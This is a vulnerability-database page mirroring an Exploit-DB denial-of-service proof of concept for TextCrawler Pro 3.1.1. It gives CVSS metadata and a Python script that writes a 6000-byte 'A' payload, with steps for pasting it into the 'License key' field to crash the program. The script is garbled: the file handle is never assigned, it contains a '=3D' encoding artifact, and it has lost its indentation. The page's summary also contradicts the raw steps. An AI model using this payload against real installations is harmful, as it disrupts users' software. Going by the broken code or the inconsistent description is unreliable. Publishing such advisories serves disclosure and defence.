TextCrawler Pro3.1.1 - Denial of Service (PoC)

vendor:

TextCrawler Pro

by:

Achilles

7.5

CVSS

HIGH

Denial of Service

119

CWE

Product Name: TextCrawler Pro

Affected Version From: 3.1.1

Affected Version To: 3.1.1

Patch Exists: No

Related CWE: N/A

CPE: a:digital_volcano:textcrawler_pro

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 x64

2020

TextCrawler Pro3.1.1 – Denial of Service (PoC)

A buffer overflow vulnerability exists in TextCrawler Pro 3.1.1 when a maliciously crafted file is opened. An attacker can exploit this vulnerability by creating a file containing a large amount of data and then opening it in TextCrawler Pro. This will cause the application to crash, resulting in a denial of service condition.

Mitigation:

Users should avoid opening untrusted files in TextCrawler Pro.

Source

Exploit-DB raw data:

# Exploit Title: TextCrawler Pro3.1.1 - Denial of Service (PoC)
# Date: 2020-05-01
# Vendor Homepage:https://www.digitalvolcano.co.uk/index.html
# Software Link:  https://www.digitalvolcano.co.uk/download/TextCrawlerPro=setup.exe
# Exploit Author: Achilles
# Tested Version: 3.1.1
# Tested on: Windows 7 x64


# 1.- Run python code :TextCrawler.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open TextCrawler Pro
# 4.- Paste the content of EVIL.txt into the Field: 'License key'
# 5.- Click 'Activate' and you will see a crash.



#!/usr/bin/env python
buffer =3D "\x41" * 6000

try:
open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"